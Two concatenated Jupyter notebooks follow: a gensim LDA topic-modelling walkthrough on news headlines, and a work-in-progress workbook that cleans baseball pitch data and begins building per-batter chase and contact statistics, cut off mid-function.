###Markdown Step 3.1: Bag of words on the dataset Now let's create a dictionary from 'processed_docs' containing the number of times a word appears in the training set. To do that, let's pass `processed_docs` to [`gensim.corpora.Dictionary()`](https://radimrehurek.com/gensim/corpora/dictionary.html) and call it '`dictionary`'. ###Code
'''
Create a dictionary from 'processed_docs' containing the number of times a word appears
in the training set using gensim.corpora.Dictionary and call it 'dictionary'
'''
dictionary = gensim.corpora.Dictionary(processed_docs)
'''
Checking dictionary created
'''
count = 0
for k, v in dictionary.iteritems():
    print(k, v)
    count += 1
    if count > 10:
        break
###Output
0 broadcast
1 communiti
2 decid
3 licenc
4 awar
5 defam
6 wit
7 call
8 infrastructur
9 protect
10 summit
###Markdown ** Gensim filter_extremes **[`filter_extremes(no_below=5, no_above=0.5, keep_n=100000)`](https://radimrehurek.com/gensim/corpora/dictionary.html#gensim.corpora.dictionary.Dictionary.filter_extremes) Filter out tokens that appear in* fewer than no_below documents (absolute number) or* more than no_above documents (fraction of total corpus size, not absolute number),* and after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
###Code
'''
OPTIONAL STEP
Remove very rare and very common words:

- words appearing less than 15 times
- words appearing in more than 10% of all documents
'''
# TODO: apply dictionary.filter_extremes() with the parameters mentioned above
dictionary.filter_extremes(no_below=15, no_above=0.1)
dictionary.token2id
###Output
_____no_output_____
###Markdown ** Gensim doc2bow **[`doc2bow(document)`](https://radimrehurek.com/gensim/corpora/dictionary.html#gensim.corpora.dictionary.Dictionary.doc2bow)* Convert document (a list of words) into the bag-of-words format = list of (token_id, token_count) 2-tuples. Each word is assumed to be a tokenized and normalized string (either unicode or utf8-encoded). No further preprocessing is done on the words in document; apply tokenization, stemming etc. before calling this method. ###Code
'''
Create the Bag-of-words model for each document i.e. for each document we create a dictionary reporting how many
words and how many times those words appear. Save this to 'bow_corpus'
'''
# TODO
bow_corpus = list( map(lambda doc: dictionary.doc2bow(doc), processed_docs))
#bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
'''
Checking Bag of Words corpus for our sample document --> (token_id, token_count)
'''
print(processed_docs[document_num])
bow_corpus[document_num]
'''
Preview BOW for our sample preprocessed document
'''
# Here document_num is document number 4310 which we have checked in Step 2
bow_doc_4310 = bow_corpus[document_num]

for i in range(len(bow_doc_4310)):
    print("Word {} (\"{}\") appears {} time.".format(bow_doc_4310[i][0],
                                                     dictionary[bow_doc_4310[i][0]],
                                                     bow_doc_4310[i][1]))
###Output
Word 71 ("bushfir") appears 1 time.
Word 107 ("help") appears 1 time.
Word 462 ("rain") appears 1 time.
Word 3530 ("dampen") appears 1 time.
###Markdown Step 3.2: TF-IDF on our document set While performing TF-IDF on the corpus is not necessary for an LDA implementation using the gensim model, it is recommended. TF-IDF expects a bag-of-words (integer values) training corpus during initialization. During transformation, it will take a vector and return another vector of the same dimensionality. *Please note: The author of Gensim dictates the standard procedure for LDA to be using the Bag of Words model.* ** TF-IDF stands for "Term Frequency, Inverse Document Frequency".*** It is a way to score the importance of words (or "terms") in a document based on how frequently they appear across multiple documents.* If a word appears frequently in a document, it's important. Give the word a high score. But if a word appears in many documents, it's not a unique identifier. Give the word a low score.* Therefore, common words like "the" and "for", which appear in many documents, will be scaled down. Words that appear frequently in a single document will be scaled up. In other words:* TF(w) = `(Number of times term w appears in a document) / (Total number of terms in the document)`.* IDF(w) = `log(Total number of documents / Number of documents with term w in it)` (a base-10 log is used in the example below; other bases only rescale the weights).** For example *** Consider a document containing `100` words wherein the word 'tiger' appears 3 times. * The term frequency (i.e., tf) for 'tiger' is then: - `TF = (3 / 100) = 0.03`. * Now, assume we have `10 million` documents and the word 'tiger' appears in `1000` of these. Then, the inverse document frequency (i.e., idf) is calculated as: - `IDF = log10(10,000,000 / 1,000) = 4`. * Thus, the Tf-idf weight is the product of these quantities: - `TF-IDF = 0.03 * 4 = 0.12`. A quick Python check of this arithmetic follows.
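This cell is not part of the original exercise; it simply verifies the 'tiger' arithmetic above: ###Code
import math

tf = 3 / 100                          # term frequency
idf = math.log10(10_000_000 / 1_000)  # inverse document frequency (base-10 log)
print(tf, idf, tf * idf)              # 0.03 4.0 0.12
###Output
_____no_output_____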
###Code
'''
Create tf-idf model object using models.TfidfModel on 'bow_corpus' and save it to 'tfidf'
'''
from gensim import corpora, models

# TODO
tfidf = models.TfidfModel(bow_corpus) # fit a model
tfidf
'''
Apply transformation to the entire corpus and call it 'corpus_tfidf'
'''
# TODO
corpus_tfidf = tfidf[bow_corpus] # apply the model to bow_corpus
corpus_tfidf
'''
Preview TF-IDF scores for our first document --> (token_id, tfidf score)
'''
from pprint import pprint

for doc in corpus_tfidf:
    pprint(doc)
    break
###Output
[(0, 0.5959813347777092),
 (1, 0.39204529549491984),
 (2, 0.48531419274988147),
 (3, 0.50554610985785686)]
###Markdown Step 4.1: Running LDA using Bag of Words We are going for 10 topics in the document corpus. ** We will be running LDA using all CPU cores to parallelize and speed up model training.** Some of the parameters we will be tweaking are:* **num_topics** is the number of requested latent topics to be extracted from the training corpus.* **id2word** is a mapping from word ids (integers) to words (strings). It is used to determine the vocabulary size, as well as for debugging and topic printing.* **workers** is the number of extra processes to use for parallelization. Uses all available cores by default.* **alpha** and **eta** are hyperparameters that affect sparsity of the document-topic (theta) and topic-word (lambda) distributions. We will let these be the default values for now (the default value is `1/num_topics`) - Alpha is the per document topic distribution. * High alpha: Every document has a mixture of all topics (documents appear similar to each other). * Low alpha: Every document has a mixture of very few topics - Eta is the per topic word distribution. * High eta: Each topic has a mixture of most words (topics appear similar to each other). * Low eta: Each topic has a mixture of few words.* **passes** is the number of training passes through the corpus.
For example, if the training corpus has 50,000 documents, chunksize is 10,000, and passes is 2, then online training is done in 10 updates: * `1 documents 0-9,999 ` * `2 documents 10,000-19,999 ` * `3 documents 20,000-29,999 ` * `4 documents 30,000-39,999 ` * `5 documents 40,000-49,999 ` * `6 documents 0-9,999 ` * `7 documents 10,000-19,999 ` * `8 documents 20,000-29,999 ` * `9 documents 30,000-39,999 ` * `10 documents 40,000-49,999` ###Code
# LDA mono-core -- fallback code in case LdaMulticore throws an error on your machine
# lda_model = gensim.models.LdaModel(bow_corpus,
#                                    num_topics = 10,
#                                    id2word = dictionary,
#                                    passes = 50)

# LDA multicore
'''
Train your lda model using gensim.models.LdaMulticore and save it to 'lda_model'
'''
# TODO
lda_model = gensim.models.LdaMulticore(bow_corpus,
                                       num_topics = 10,
                                       id2word = dictionary,
                                       passes = 2,
                                       workers = 2)
'''
For each topic, we will explore the words occurring in that topic and its relative weight
'''
for idx, topic in lda_model.print_topics(-1):
    print("Topic: {} \nWords: {}".format(idx, topic))
    print("\n")
###Output
Topic: 0
Words: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash"


Topic: 1
Words: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park"


Topic: 2
Words: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall"


Topic: 3
Words: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat"


Topic: 4
Words: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust"


Topic: 5
Words: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial"


Topic: 6
Words: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit"


Topic: 7
Words: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt"


Topic: 8
Words: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise"


Topic: 9
Words: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join"
###Markdown Classification of the topics Using the words in each topic and their corresponding weights, what categories were you able to infer?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 4.2 Running LDA using TF-IDF ###Code
'''
Define lda model using corpus_tfidf, again using gensim.models.LdaMulticore()
'''
# TODO
lda_model_tfidf = gensim.models.LdaMulticore(corpus_tfidf,
                                             num_topics = 10,
                                             id2word = dictionary,
                                             passes = 2,
                                             workers = 2)
'''
For each topic, we will explore the words occurring in that topic and its relative weight
'''
for idx, topic in lda_model_tfidf.print_topics(-1):
    print("Topic: {} Word: {}".format(idx, topic))
    print("\n")
###Output
Topic: 0 Word: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" +
0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season" Topic: 1 Word: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign" Topic: 2 Word: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash" Topic: 3 Word: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg" Topic: 4 Word: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station" Topic: 5 Word: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit" Topic: 6 Word: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan" Topic: 7 Word: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti" Topic: 8 Word: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon" Topic: 9 Word: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack" ###Markdown Classification of the topics As we can see, when using tf-idf, heavier weights are given to words that are not as frequent which results in nouns being factored in. That makes it harder to figure out the categories as nouns can be hard to categorize. This goes to show that the models we apply depend on the type of corpus of text we are dealing with. Using the words in each topic and their corresponding weights, what categories could you find?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 5.1: Performance evaluation by classifying sample document using LDA Bag of Words modelWe will check to see where our test document would be classified. ###Code ''' Text of sample document 4310 ''' processed_docs[4310] ''' Check which topic our test document belongs to using the LDA Bag of Words model. 
''' document_num = 4310 # Our test document is document number 4310 # TODO # Our test document is document number 4310 for index, score in sorted(lda_model[bow_corpus[document_num]], key=lambda tup: -1*tup[1]): print("\nScore: {}\t \nTopic: {}".format(score, lda_model.print_topic(index, 10))) ###Output Score: 0.553202748298645 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall" Score: 0.28677472472190857 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat" Score: 0.020009001716971397 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park" Score: 0.020004812628030777 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit" Score: 0.0200041513890028 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise" Score: 0.020001856610178947 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash" Score: 0.020001748576760292 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt" Score: 0.02000090852379799 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust" Score: 0.020000092685222626 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join" Score: 0.020000003278255463 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial" ###Markdown It has the highest probability (`x`) to be part of the topic that we assigned as X, which is the accurate classification. Step 5.2: Performance evaluation by classifying sample document using LDA TF-IDF model ###Code ''' Check which topic our test document belongs to using the LDA TF-IDF model. 
''' # Our test document is document number 4310 for index, score in sorted(lda_model_tfidf[bow_corpus[document_num]], key=lambda tup: -1*tup[1]): print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 10))) ###Output Score: 0.8199763894081116 Topic: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan" Score: 0.020008740946650505 Topic: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash" Score: 0.020004352554678917 Topic: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti" Score: 0.02000252529978752 Topic: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit" Score: 0.0200019683688879 Topic: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg" Score: 0.020001957193017006 Topic: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station" Score: 0.020001888275146484 Topic: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack" Score: 0.020001139491796494 Topic: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign" Score: 0.020000556483864784 Topic: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon" Score: 0.020000483840703964 Topic: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season" ###Markdown It has the highest probability (`x%`) to be part of the topic that we assigned as X. Step 6: Testing model on unseen document ###Code unseen_document = "My favorite sports activities are running and swimming." 
# Data preprocessing step for the unseen document bow_vector = dictionary.doc2bow(preprocess(unseen_document)) for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1]): print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5))) ###Output Score: 0.4200000762939453 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" Score: 0.2199999839067459 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" Score: 0.2199920117855072 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" Score: 0.020004048943519592 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" Score: 0.02000385895371437 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" Score: 0.019999999552965164 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" Score: 0.019999999552965164 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" Score: 0.019999999552965164 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" Score: 0.019999999552965164 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" Score: 0.019999999552965164 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost"
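###Markdown Extra: comparing the two models with topic coherence This cell is not part of the original exercise; it is a hedged sketch that scores both models with gensim's `CoherenceModel` (assuming a reasonably recent gensim version). Higher coherence is generally better. ###Code
from gensim.models import CoherenceModel

# c_v coherence needs the tokenized texts, not just the BOW corpus
texts = processed_docs.tolist()

for name, model in [('bag of words', lda_model), ('tf-idf', lda_model_tfidf)]:
    cm = CoherenceModel(model=model, texts=texts, dictionary=dictionary, coherence='c_v')
    print(name, cm.get_coherence())
###Output
_____no_output_____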
Work in progress/cleaning_workbook.ipynb
###Markdown Import Install Packages Import Packages ###Code
import pandas as pd
import numpy as np
import random
###Output
_____no_output_____
###Markdown Import Data ###Code
filenames = [str(i) + '.pkl' for i in range(2010,2019)]
seasons = ['df_' + str(i) for i in range(10,19)]

season_dataframes = {}

for i in list(zip(filenames, seasons)):
    path = "Season_pickles/" + i[0]
    season_dataframes[i[1]] = pd.read_pickle(path, compression='zip')
###Output
_____no_output_____
###Markdown Concatenate Data ###Code
pitches = pd.concat(season_dataframes.values())
###Output
_____no_output_____
###Markdown Clean All Instances **Issue**: There are some instances where no data is recorded**Solution**: Drop these instances from the data ###Code
pitches = pitches.dropna(axis = 0, how = 'all')
###Output
_____no_output_____
###Markdown --- Pitch Type **Feature Name**: `pitch_type`**Feature Description**: The type of pitch derived from Statcast. **Issue**: The feature is supposed to contain a 2 character string, but many values (265) are filled with long strings of numerical characters. Example: 160421_181540**Solution**: Replace values longer than 2 characters in length with np.NaN ###Code
pitches['pitch_type'] = pitches.apply(
    lambda row: np.NaN\
    if len(str(row['pitch_type'])) > 2\
    else row['pitch_type'], axis = 1)
###Output
_____no_output_____
###Markdown **Issue**: Many values of this feature are recorded as 'UN'**Solution**: Replace the value with np.NaN ###Code
pitches['pitch_type'] = pitches['pitch_type'].replace({'UN':np.nan})
###Output
_____no_output_____
###Markdown **Issue**: The pitch type feature is filled with NaN values**Solution**: We will create a mapping of each pitcher's id and his normalized pitch counts. Using these normalized values as weights we will select a random pitch type and fill the NaN value for that pitcher. We will use df.apply, but this could be time optimized by using series vectorization (a lighter-weight variant is sketched right after this cell). ###Code
# Create mapping

# List of unique pitcher IDs
pitcher_list = pitches['pitcher'].unique().tolist()

pitcher_dict = {}

for pitcher in pitcher_list:
    # Pitcher's prior pitch type probabilities
    pitch_type_weights = pitches[pitches.pitcher == pitcher]\
                            .pitch_type\
                            .value_counts(normalize=True)
    pitcher_dict[pitcher] = pitch_type_weights.to_dict()

# Fill nan values
pitcher_dict = pd.DataFrame(pitcher_dict).fillna(0).to_dict()

# Select replacement pitch type and fill NaN values
def pick_a_pitch(pitcher_id):
    """
    Returns a random pitch type label
    Uses the pitcher's prior pitch type probabilities as weights
    """
    population = list(pitcher_dict[pitcher_id].keys())
    weights = list(pitcher_dict[pitcher_id].values())
    return random.choices(population, weights, k=1)[0]

# Iterate by instance, fill null values
pitches['pitch_type'] = pitches.apply(
    lambda row: pick_a_pitch(row['pitcher']) \
    if pd.isnull(row['pitch_type']) \
    else row['pitch_type'], axis = 1)

pitch_type_map = {'FA':'fastball', 'FF':'fastball', 'FT':'fastball', 'FC':'fastball', 'FS':'fastball',
                  'SI':'fastball', 'SF':'fastball', 'SL':'breaking', 'CB':'breaking', 'CU':'breaking',
                  'SC':'breaking', 'KC':'breaking', 'CH':'offspeed', 'KN':'offspeed', 'EP':'offspeed',
                  'FO':'breaking', 'PO':'pitchout', 'IN':'pitchout'}

pitches['pitch_subtype'] = pitches['pitch_type']
pitches['pitch_type'] = pitches['pitch_type'].map(pitch_type_map)
###Output
_____no_output_____
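###Markdown As noted above, the apply-based fill visits every row. This cell is a hedged sketch (not part of the original workbook) of one lighter-weight alternative that touches only the rows where `pitch_type` is missing; it is shown for illustration, since by this point the NaNs have already been filled: ###Code
# alternative to the apply-based fill above: operate on the null rows only
mask = pitches['pitch_type'].isna()
pitches.loc[mask, 'pitch_type'] = [
    pick_a_pitch(pitcher_id) for pitcher_id in pitches.loc[mask, 'pitcher']
]
###Output
_____no_output_____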
###Markdown --- Count **Feature**: Count status**Description**: The state of balls and strikes for the current at bat **Issue**: There are two existing features related to the count. We need to represent the count as a single categorical feature.**Solution**: Classify the pitcher's position regarding the count (Ahead, Behind, Neutral) ###Code
pitches['balls'] = pitches['balls'].replace({4:3, 5:3})

pitches['count_status'] = pitches['balls'].astype('int').astype('str')\
                        + pitches['strikes'].astype('int').astype('str')

count_status_mapping = {
    '00':'neutral',
    '21':'neutral',
    '32':'neutral',
    '10':'behind',
    '20':'behind',
    '30':'behind',
    '31':'behind',
    '01':'ahead',
    '02':'ahead',
    '11':'ahead',
    '12':'ahead',
    '22':'ahead'
}

pitches['count_status'] = pitches['count_status'].map(count_status_mapping)
###Output
_____no_output_____
###Markdown --- Score Differential **Feature**: Score Differential**Description**: The absolute value of the difference between the home team score and the away team score ###Code
pitches['score_differential'] = abs(pitches['home_score'] - pitches['away_score'])
###Output
_____no_output_____
###Markdown --- Bases Loaded **Feature**: Bases Loaded**Description**: A binary indicator of whether the bases are loaded ###Code
# non-null runner ids become 1 (base occupied); nulls become 0 after fillna
pitches['on_1b'] = pitches['on_1b'] * 0 + 1
pitches['on_1b'] = pitches['on_1b'].fillna(0)

pitches['on_2b'] = pitches['on_2b'] * 0 + 1
pitches['on_2b'] = pitches['on_2b'].fillna(0)

pitches['on_3b'] = pitches['on_3b'] * 0 + 1
pitches['on_3b'] = pitches['on_3b'].fillna(0)

# bases loaded means all three bases are occupied
pitches['bases_loaded'] = pitches['on_1b'] + pitches['on_2b'] + pitches['on_3b']
pitches['bases_loaded'] = pitches['bases_loaded'].apply(lambda x: 1 if x == 3 else 0)
###Output
_____no_output_____
###Markdown --- Swung **Feature**: swung**Description**: Binary feature describing whether or not the batter swung at the pitch ###Code
swung = ['foul','hit_into_play','swinging_strike','hit_into_play_no_out',
         'hit_into_play_score','foul_tip','swinging_strike_blocked',
         'foul_bunt','missed_bunt']

pitches['batter_swung'] = pitches['description'].apply(lambda x: 1 if x in swung else 0)

# flag pitches outside the strike zone in each direction
pitches['ball_high'] = pitches['plate_z'] > pitches['sz_top']
pitches['ball_low'] = pitches['plate_z'] < pitches['sz_bot']
pitches['ball_left'] = pitches['plate_x'].apply(lambda x: x < -0.73)
pitches['ball_right'] = pitches['plate_x'].apply(lambda x: x > 0.73)

# a pitch is in the strike zone only if none of the four flags are set
pitches['in_strikezone'] = (pitches['ball_high'].astype(int) + pitches['ball_low'].astype(int) +
                            pitches['ball_left'].astype(int) + pitches['ball_right'].astype(int))
pitches['in_strikezone'] = pitches['in_strikezone'].apply(
    lambda x: 0 if x > 0 else 1)

# chased = swung at a pitch outside the strike zone
pitches['chased'] = pitches['batter_swung'] - pitches['in_strikezone']
pitches['chased'] = pitches['chased'].apply(lambda x: 1 if x == 1 else 0)
###Output
_____no_output_____
###Markdown Batters Data ###Code
sample_batter = list(pitches['batter'].unique())[0]
sample_batter
batter_df = pitches[pitches['batter'] == sample_batter]
batter_df.head()
next_probs = batter_df.groupby('pitch_type').size().div(len(batter_df))
next_probs
batter_df['pitch_type'].value_counts(normalize = True).to_dict()
pd.DataFrame(batter_df.groupby(['pitch_type', 'chased']).size().div(len(batter_df)).div(next_probs, axis=0, level='pitch_type'))
batter_dict = {}
pitch_types = pitches['pitch_type'].unique().tolist()
pitch_type_percentages = batter_df['pitch_type'].value_counts(normalize=True)

for pitch_type in pitch_types:
    batter_dict[pitch_type + '_perc_faced'] = pitch_type_percentages[pitch_type] * 100

batter_dict

for pitch_type in pitch_types:
    cat_df = batter_df[batter_df['pitch_type'] == pitch_type]

    out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum()
    chased_count = cat_df['chased'].sum()
    chase_perc = (chased_count / out_of_strikezone) * 100
out_of_strikezone) * 100 batter_dict[pitch_type + '_chase_perc'] = chase_perc ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) swung_count = cat_df['batter_swung'].sum() batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 batter_dict for pitch_type in pitch_types: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) swung_count = cat_df['batter_swung'].sum() batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 #calc ball in play % for each swing for each pitch cat: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column #assign the ball in play % per swing to the batter dict batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 def make_batters_df(prior_df): df = prior_df.copy() #make list of the unique batter ids batters = list(df['batter'].unique()) #initialize empty dictionary to store the batter stats batters_dict = {} #set a break flag to False for error-checking brk = False #iterate thru each unique batter for batter in batters: if brk: break #make subset of the df for that batter and assign to variable batter_df batter_df = df[df['batter'] == batter] #assign all pitch categories to list: all_pitch_cats = ['fastball', 'breaking', 'offspeed', 'pitchout'] #assign the pitch categories to a list try: pitch_cats = batter_df['pitch_type'].unique().tolist() except KeyError: print(batter) brk = True #get the normalized value counts of pitches by category that batter has faced vc = batter_df['pitch_type'].value_counts(normalize=True) #initialize empty dict for each batter batter_dict = {} #if there are any pitch categories the batter has not faced, unfaced_cats = list(set(all_pitch_cats) - set(pitch_cats)) for cat in pitch_cats: if brk: break #assign the % of pitches faced by the batter for that category to his batter dict try: batter_dict[cat + '_perc_faced'] = vc[cat] * 100 except TypeError: print(batter) return 1 #continue out of the loop for pitchout category since ball in play stats are NaN if cat == 'pitchout': continue #grab subset of batter df for the pitch category cat_df = batter_df[batter_df['pitch_type'] == cat] #if he has faced less than 100 pitches of that type, add it to unfaced_category and fill w NaN if len(cat_df) < 100: unfaced_cats.append(cat) continue #calculate batters chase % for pitch type category on balls outside the strikezone out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum() #num of times ball was out of zone chased_count = cat_df['chased'].sum() #num of times batter chased try: chase_perc = (chased_count / out_of_strikezone) * 100 except ZeroDivisionError: chase_perc = np.nan #assign the chase perc to the batter dict batter_dict[cat + '_chase_perc'] = chase_perc #calc ball in play % for each swing for each pitch cat: ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column #assign the ball in play % per swing to the batter dict batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100 #calculate taken strike % taken_strike_count = len(cat_df[(cat_df['in_strikezone'] == 1) & (cat_df['batter_swung'] == 0)]) pitches_in_zone_count = cat_df['in_strikezone'].sum() #counts the 1s in the in zone col #assign to batter_dict batter_dict[cat + '_taken_strike_perc'] = (taken_strike_count / 